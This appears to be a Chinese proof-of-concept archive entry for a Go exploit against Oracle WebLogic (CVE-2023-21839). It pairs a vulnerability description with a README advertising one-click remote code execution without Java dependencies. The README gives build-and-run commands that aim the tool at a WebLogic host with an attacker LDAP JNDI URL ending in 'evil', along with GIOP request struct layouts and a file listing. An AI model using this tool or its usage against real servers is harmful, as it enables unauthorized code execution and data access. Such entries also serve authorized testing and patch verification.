关联漏洞
标题:
Oracle WebLogic Server 安全漏洞
(CVE-2023-21839)
描述:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。
描述
Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)
介绍
## CVE-2023-21839
**未经授权许可使用本项目攻击或测试目标是非法的,本程序应仅用于授权的安全测试与研究目的**
### 介绍
Weblogic CVE-2023-21839 RCE
(1)**无需任何 Java 依赖,构造协议通过socket直接RCE**
(2)已解决 IIOP 的 NAT 网络问题(可测试 Docker 与公网目标)
(3)在 Windows/Mac OS/Linux 以及 Weblogic 12/14 中测试通过
(4)请使用 JDK 8u191 以下启动 Weblogic 并自行搭建 JNDI Server
### 使用
```shell
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
```

### 其他
Locate Request
```go
type LocateRequest struct {
Header *Header
RequestId []byte // 4
TargetAddress []byte // 2
_reserved []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
}
```
Resolve Request
```go
type ResolveRequest struct {
Header *Header
RequestId []byte // 4
ResponseFlags []byte // 1
_reserved1 []byte // 3
TargetAddress []byte // 2
_reserved2 []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
_operationLength []byte // 4
RequestOperation []byte // _operationLength
_reserved3 []byte // 1
ServiceContextList *ServiceContextList
CosNamingDissector []byte // no limit
}
```
Rebind Request
```go
type RebindRequest struct {
Header *Header
RequestId []byte // 4
ResponseFlags []byte // 1
_reserved1 []byte // 3
TargetAddress []byte // 2
_reserved2 []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
_operationLength []byte // 4
RequestOperation []byte // _operationLength
_reserved3 []byte // 2
ServiceContextList *ServiceContextList
StubData []byte // no limit
}
```
文件快照
[4.0K] /data/pocs/500070869e0cccebf7f6b804ce10084fe0043a3f
├── [4.0K] cmd
│ └── [ 12K] main.go
├── [ 318] constant.go
├── [ 301] giop.go
├── [ 31] go.mod
├── [ 218] header.go
├── [4.0K] img
│ └── [ 79K] rce.png
├── [1.1K] locate_request.go
├── [ 94] log.go
├── [1.9K] README.md
├── [2.9K] rebind_request.go
├── [2.9K] resolve_request.go
├── [ 423] service_context.go
└── [ 479] version.go
2 directories, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。